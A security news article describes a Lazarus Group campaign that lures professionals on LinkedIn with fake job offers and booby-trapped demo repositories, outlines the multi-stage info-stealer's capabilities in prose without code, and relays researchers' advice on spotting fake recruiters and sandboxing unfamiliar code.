North Korean cybercriminal Lazarus Group is exploiting LinkedIn’s professional networking environment to execute sophisticated malware attacks disguised as job recruitment campaigns. A newly discovered operation has revealed that attackers use fake job offers to lure professionals into downloading malicious code, ultimately compromising their credentials and exfiltrating sensitive data.
Researchers discovered initiates with fraudulent job offers, often for roles in cryptocurrency, finance, or travel-related projects. Victims are enticed by remote work flexibility and competitiveness. Once the target expresses interest, the attacker requests a CV or GitHub repository link, which can be used to gather intelligence and add legitimacy to the interaction.
Following initial contact, the attacker provides a repository containing a ‘minimum viable product’ (MVP) and a document with technical questions requiring running the demo code. While the code appears legitimate initially, it contains obfuscated scripts designed to load and execute malicious software from a remote server.
The deployed malware is a sophisticated cross-platform info-stealer capable of infiltrating Windows, macOS, and Linux systems. It targets cryptocurrency wallets and browser extensions, harvesting login credentials, session data, and sensitive files. The stolen data is then transmitted to a malicious command-and-control (C2) server.
The attack unfolds in multiple stages. Initially, a JavaScript-based info-stealer scans browser extensions for crypto wallets while exfiltrating login credentials and browsing data. A Python script is then executed, setting the stage for further exploits. Attackers also deploy additional Python modules to monitor keyboard inputs and clipboard activity, collect system data, and extract login and payment details from multiple browsers.
As the final payload, a .NET-based malware package is installed to bypass Microsoft Defender protections, set up a Tor Proxy Server for covert communication, deploy a crypto-miner to exploit system resources, implement a keylogger to capture user credentials, and steal classified files and personal data.
Multiple programming languages are used by the Lazarus Group, along with several techniques to enable the malware to evade detection and maintain persistence.
Researchers have cautioned users to refrain from engaging with suspicious job offers that lack description. Also, users should visit official company postings to double-check the offer. On LinkedIn and other social media, users should also visit the profile of the person who posted the job offer. Usually, for the attack, the threat actors create a new profile with little background activities.
Users should not engage with recruiters who do not use their official company email or exhibit inconsistent language skills.
“It is ideal to never execute any foreign source code on enterprise devices, and to use Virtual Machines, sandboxes or various online platforms when doing so on personal computers. Even though this would add some overhead to the process, it would prevent any personal information from being leaked and used with malicious intent in the future,” researchers concluded.
In the News: AMD patches high-severity flaw affecting Zen 1 to Zen 4 chips
